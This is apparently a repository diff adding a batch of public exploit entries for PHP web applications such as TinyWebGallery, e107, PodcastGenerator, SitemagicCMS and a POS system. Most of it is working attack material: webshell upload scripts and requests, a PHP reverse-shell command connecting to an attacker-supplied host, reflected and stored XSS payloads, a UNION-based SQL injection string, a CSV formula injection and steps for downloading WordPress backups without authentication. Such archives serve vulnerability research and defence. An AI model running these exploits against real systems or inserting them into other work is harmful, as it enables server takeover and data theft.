Injecting persistent javascript code inside the title and/or description while creating a task/expense/project (and
possibly others) it will be triggered once page gets loaded.
Steps to reproduce:
- Click on "Expenses", or "Tasks" and add (or edit an existing) one,
- Insert a payload PoC inside a field, in example in the "Phone number" (or "Description"),
- Click on 'Save'.
Visiting the website dashboard, as well as the customer or project summary page, the javascript code will be executed.
PoC Screenshots:
https://imagebin.ca/v/7FOZfztkDs3I

12
exploits/php/webapps/51436.py
View file

@ -1,6 +1,6 @@
#!/usr/bin/python
# Exploit Title: File Thingie 2.5.7 - Remote Code Execution (RCE)
# Exploit Title: File Thingie 2.5.7 - Arbitary File Upload to RCE
# Google Dork: N/A
# Date: 27th of April, 2023
# Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
@ -11,7 +11,7 @@
# Vulnerability originally discovered / published by Cakes
# Reference: https://www.exploit-db.com/exploits/47349
# Run a local listener on your machine and youre good to go
# Run a local listener on your machine and you're good to go
import os
@ -44,7 +44,7 @@ class Exploit:
elif response.status_code == 200:
if "Invalid username or password" in response.text:
print(f"Invalid username or password")
print(f"[-] Invalid username or password")
return False
return True
@ -74,7 +74,7 @@ class Exploit:
print(f"[+] Zipped payload to {self.payload_filename}.zip")
return True
except:
print(f"[-] Could not create payload to {self.payload_filename}.zip")
print(f"[-] Could not zip payload to {self.payload_filename}.zip")
return False
def upload_payload(self) -> bool:
@ -142,7 +142,7 @@ class Exploit:
if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text:
print("[+] Unzipping payload successful")
print(f"[+] You can now execute commands by opening {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")
print(f"[+] You can now execute commands by browsing {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")
return True
else:
@ -150,7 +150,7 @@ class Exploit:
return False
def execute_payload(self) -> bool:
print("[*] Trying the get a reverse shell")
print("[*] Trying to get a reverse shell")
cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'")
print("[*] Executing payload")

124
exploits/php/webapps/51443.txt Normal file
View file

@ -0,0 +1,124 @@
#Exploit Title: TinyWebGallery v2.5 - Remote Code Execution (RCE)
#Application: TinyWebGallery
#Version: v2.5
#Bugs: RCE
#Technology: PHP
#Vendor URL: http://www.tinywebgallery.com/
#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
#Date of found: 07-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Go to upload image http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
2. upload .phar file
payload: payload: <?php echo system("cat /etc/passwd"); ?>
3. go to file link
poc request:
POST /twg25/admin/index.php?action=upload&dir=&order=name&srt=yes&tview=no&sview=no&lang=en HTTP/1.1
Host: localhost
Content-Length: 2123
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary53rZRhJinqaMm7Ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
Connection: close
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="token"
b2ed5512107a625ef9d5688ced296c61
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2097152
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="confirm"
true
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename="shell.phar"
Content-Type: application/octet-stream
<?php echo system("cat /etc/passwd"); ?>
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="twgsize"
100000
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="twgquality"
80
------WebKitFormBoundary53rZRhJinqaMm7Ip--
http://localhost/twg25/pictures/shell.phar

38
exploits/php/webapps/51445.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")
# Date: 2023-05-10
# Exploit Author: Wadeek
# Vendor Homepage: https://backupbliss.com/
# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip
# Version: 1.2.8
# Tested on: WordPress 6.2
1) Get the version of the plugin.
=> GET /wp-content/plugins/backup-backup/readme.txt
--------------------------------------------------------------------------
Stable tag: 1.2.8
--------------------------------------------------------------------------
2) Get the name of the backup directory.
=> GET /wp-content/backup-migration/config.json
--------------------------------------------------------------------------
{
[...],
"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
[...],
"OTHER:EMAIL":"admin@email.com"
}
--------------------------------------------------------------------------
3) Get the name of the archive containing the backups.
=> GET /wp-content/backup-migration/complete_logs.log
--------------------------------------------------------------------------
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
--------------------------------------------------------------------------
4) Build the path for the download.
=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip

150
exploits/php/webapps/51449.txt Normal file
View file

@ -0,0 +1,150 @@
# Exploit Title: e107 v2.3.2 - Reflected XSS
# Date: 11/05/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 2.3.2
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### XSS Reflected - unauthorized
URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php
Parameters: content
# POC
Request:
POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 1126
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: text/html, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml
Response:
HTTP/1.1 200 OK
Date: Thu, 11 May 2023 19:38:45 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1053
Connection: close
Content-Type: text/html; charset=UTF-8
<!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb
### XSS Reflected - Authorized
URL: http://127.0.0.1/e107/e107_admin/image.php
Parameters: for
# POC 1
Request:
GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Response:
HTTP/1.1 200 OK
Date: Thu, 04 May 2023 03:07:35 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "37f107dbe6a998ecf7b71689627c2a56"
Content-Length: 12420
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: hacked">bbbbb</title>
<meta charset='utf-8' />
<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
<!-- *CSS* -->
[...]
<div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path=">
<p>No HTML5 support.</p>
</div>
[...]
# POC 2
URL: http://127.0.0.1/e107/e107_admin/newspost.php
Parameters: Payload in URL
Request:
GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8
Connection: close
Response:
HTTP/1.1 200 OK
Date: Fri, 05 May 2023 06:21:53 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "d127dd6a44a22e093fed60b83bf36af2"
Content-Length: 72914
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
<!doctype html>
<html lang="en">
<head>
<title>News - List - Admin Area :: hacked">bbbbb</title>
<meta charset='utf-8' />
<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
<!-- *CSS* -->
[...]
<a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h">
<script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a>
[...]

84
exploits/php/webapps/51450.php Normal file
View file

@ -0,0 +1,84 @@
<?php
/*
Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution
Date: 12/05/2023
Exploit Author: Chokri Hammedi
Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
Software Link: https://github.com/thrsrossi/Millhouse-Project.git
Version: 1.414
Tested on: Debian
CVE: N/A
*/
$options = getopt('u:c:');
if(!isset($options['u'], $options['c']))
die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi
\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
\033[0m\n
\n");
$target = $options['u'];
$command = $options['c'];
$url = $target . '/includes/add_post_sql.php';
$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="title"
helloworld
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="description"
<p>sdsdsds</p>
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="category"
1
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="image"; filename="rose.php"
Content-Type: application/x-php
<?php
$shell = shell_exec("' . $command . '");
echo $shell;
?>
------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
';
$headers = array(
'Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
'Cookie: PHPSESSID=rose1337',
);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
$response = curl_exec($ch);
curl_close($ch);
// execute command
$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
$ch = curl_init($shell);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$exec_shell = curl_exec($ch);
curl_close($ch);
echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";
?>

28
exploits/php/webapps/51451.txt Normal file
View file

@ -0,0 +1,28 @@
[#] Exploit Title: WBiz Desk 1.2 - SQL Injection
[#] Exploit Date: May 12, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: WBiz Desk
[#] Application Version: 1.2
[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system
[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: SQL@hotmail.co.uk
[#] Blog: https://www.0wl.tech
[#] 3xploit:
[path]//ticket.php?tk=[SQL Injection]
[#] 3xample:
[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -
[#] Notes:
- The vulnerability requires a non-admin privilege (normal) user to be exploited.

184
exploits/php/webapps/51454.txt Normal file
View file

@ -0,0 +1,184 @@
#Exploit Title: PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)
#Application: PodcastGenerator
#Version: v3.2.9
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://podcastgenerator.net/
#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
#Date of found: 14-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
#########XSS -1##############
1.go to 'Episodes' then 'Upload New Episodes'(http://localhost/PodcastGenerator/admin/episodes_upload.php)
2.set title section as <img src=1 onerror=alert("XSS-1")>
3.And go to 'View All Episoded'(http://localhost/PodcastGenerator/admin/episodes_list.php)
payload: <img src=1 onerror=alert("XSS-1")>
poc- request:
POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1
Host: localhost
Content-Length: 8307
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3NXAbhxohxCgUFNi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="file"; filename="2023-05-13_2_images.jpeg"
Content-Type: image/jpeg
image content asdfasdfasdfasdfasdfasdfasdfa
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="title"
<img src=1 onerror=alert("XSS-1")>
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="shortdesc"
fffff
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="date"
2023-05-14
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="time"
11:05
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="episodecover"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="longdesc"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="episodenum"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="seasonnum"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="itunesKeywords"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="explicit"
yes
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="authorname"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="authoremail"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="customtags"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="token"
6GnmEMNnhFfyNeTRciGsh8p4R4djazh8
------WebKitFormBoundary3NXAbhxohxCgUFNi--
#########XSS -2##############
1.go to "Themes and aspect" then "Customize your Freebox" (http://localhost/PodcastGenerator/admin/theme_freebox.php)
2. set Freebox content as <script>alert("XSS-2")</script>
3.go to home page (http://localhost/PodcastGenerator/)
payload: <script>alert("XSS-2")</script>
poc Request:
POST /PodcastGenerator/admin/theme_freebox.php?change=1 HTTP/1.1
Host: localhost
Content-Length: 96
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/theme_freebox.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close
content=%3Cscript%3Ealert%28%22XSS-2%22%29%3C%2Fscript%3E&token=6GnmEMNnhFfyNeTRciGsh8p4R4djazh8
#########XSS -3##############
1. go to "Podcast Details" then "Change Podcast Details" (http://localhost/PodcastGenerator/admin/podcast_details.php)
2. set "Podcast tile " as <svg/onload=prompt("XSS-3")>
3.go to home page (http://localhost/PodcastGenerator/)
payload: <svg/onload=prompt("XSS-3")>
poc-request:
POST /PodcastGenerator/admin/podcast_details.php?edit=1 HTTP/1.1
Host: localhost
Content-Length: 300
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/podcast_details.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close
podcast_title=%3Csvg%2Fonload%3Dprompt%28%22XSS-3%22%29%3E&podcast_subtitle=dd&podcast_description=dd&copyright=dd&author_name=Podcast+Generator+UserP&author_email=podcastgenerator%40example.com&podcast_guid=&feed_language=en&explicit_podcast=yes&feed_locked=no&token=xVrlAT6NG2ZrbGanycblGYoOOIitXXKC

148
exploits/php/webapps/51462.py Executable file
View file

@ -0,0 +1,148 @@
# Exploit Title: Best POS Management System v1.0 - Unauthenticated Remote Code Execution
# Google Dork: NA
# Date: 15/5/2023
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Kali Linux
import sys
import requests
import subprocess
import time
if len(sys.argv) < 2:
print("\033[91mUsage: %s <IP>\033[0m" % sys.argv[0])
print("Example: %s 192.168.106.130" % sys.argv[0])
sys.exit(1)
ip = sys.argv[1]
url = f"http://{ip}/kruxton/ajax.php?action=save_settings"
def brute_force_timestamp(timestamp_prev, ip):
progress = 0
webshell = None
for i in range(20):
for j in range(0, 1000, 20):
timestamp = timestamp_prev - (timestamp_prev % 1000) + j + i
url = f"http://{ip}/kruxton/assets/uploads/{timestamp}_shell.php"
response = requests.get(url)
if response.status_code == 200:
webshell = url
break
progress += 1
print(f"Attempt {progress}/400", end="\r")
time.sleep(0.1)
if progress >= 400:
break
if webshell or progress >= 400:
break
if webshell:
print("\033[92m[+] Webshell found:", webshell, "\033[0m")
else:
print("\033[91m[-] Webshell not found\033[0m")
return webshell
def get_unix_timestamp():
timestamp = subprocess.check_output(['date', '+%s']).decode().strip()
return int(timestamp)
def extract_output(response_text):
start_tag = "<pre>"
end_tag = "</pre>"
start_index = response_text.find(start_tag)
end_index = response_text.find(end_tag)
if start_index != -1 and end_index != -1 and start_index < end_index:
output = response_text[start_index + len(start_tag):end_index]
return output.strip()
return None
def code_execution(webshell):
if not webshell:
print("\033[91mWebshell URI not provided\033[0m")
return
while True:
command = input("Enter command to execute (or 'exit' to quit): ")
if command == 'exit':
break
url = webshell + f"?cmd={command}"
response = requests.get(url)
output = extract_output(response.text)
if output:
print("\033[93m[+] Output:\033[0m")
print(output)
else:
print("\033[91m[-] No output received\033[0m")
data = '''\
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="name"
test
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="email"
test@gmail.com
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="contact"
9000000000
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="about"
test
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/x-php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
-----------------------------49858899034227071432271107689--'''
headers = {
'Host': f"{ip}",
'X-Requested-With': 'XMLHttpRequest',
'Content-Type': 'multipart/form-data; boundary=---------------------------49858899034227071432271107689',
'Content-Length': str(len(data)),
'Connection': 'close'
}
timestamp_prev = get_unix_timestamp()
response = requests.post(url, data=data, headers=headers)
if response.status_code == 200 and response.text == '1':
print("[+] Timestamp: %s" % timestamp_prev)
print("\033[92m[+] Successly uploaded shell! Unauthenticated! \033[0m")
webshell = brute_force_timestamp(timestamp_prev, ip)
code_execution(webshell)
else:
print("Did not worked")

20
exploits/php/webapps/51463.txt Normal file
View file

@ -0,0 +1,20 @@
Exploit Title: Prestashop 8.0.4 - CSV injection
Application: prestashop
Version: 8.0.4
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://prestashop.com/
Software Link: https://prestashop.com/prestashop-edition-basic/
Date of found: 14.05.2023
Author: Mirabbas Ağalarov
Tested on: Windows
2. Technical Details & POC
========================================
Step 1. login as user
step 2. Go to My Account then information ( http://localhost/index.php?controller=identity )
step 3. Set Email as =calc|a!z|@test.com
step 3. If admin Export costumers as CSV file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admin07637b2omxxdbmhikgb/index.php/sell/customers/?_token=mtc1BTvq-Oab2lBdfCaxpOorYraGGVMiTFluJzOpkWI)
payload: =calc|a!z|@test.com

63
exploits/php/webapps/51464.txt Normal file
View file

@ -0,0 +1,63 @@
#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE)
#Application: SitemagicCMS
#Version: 4.4.3
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://sitemagic.org/Download.html
#Software Link: https://github.com/Jemt/SitemagicCMS
#Date of found: 14-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. go to content then files
2. upload shell.phar file but content as <?php echo system("cat /etc/passwd"); ?>
3. go to http://localhost/SitemagicCMS/files/images/shell.phar
payload: <?php echo system("cat /etc/passwd"); ?>
Poc request :
POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1
Host: localhost
Content-Length: 492
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf
Connection: close
------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar"
Content-Type: application/octet-stream
<?php echo system('cat /etc/passwd'); ?>
------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMPostBackControl"
------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMRequestToken"
60a7a113cf94842a197912273825b421
------WebKitFormBoundarywPUsZSbtgJ6nAn8W--

45
exploits/php/webapps/51465.txt Normal file
View file

@ -0,0 +1,45 @@
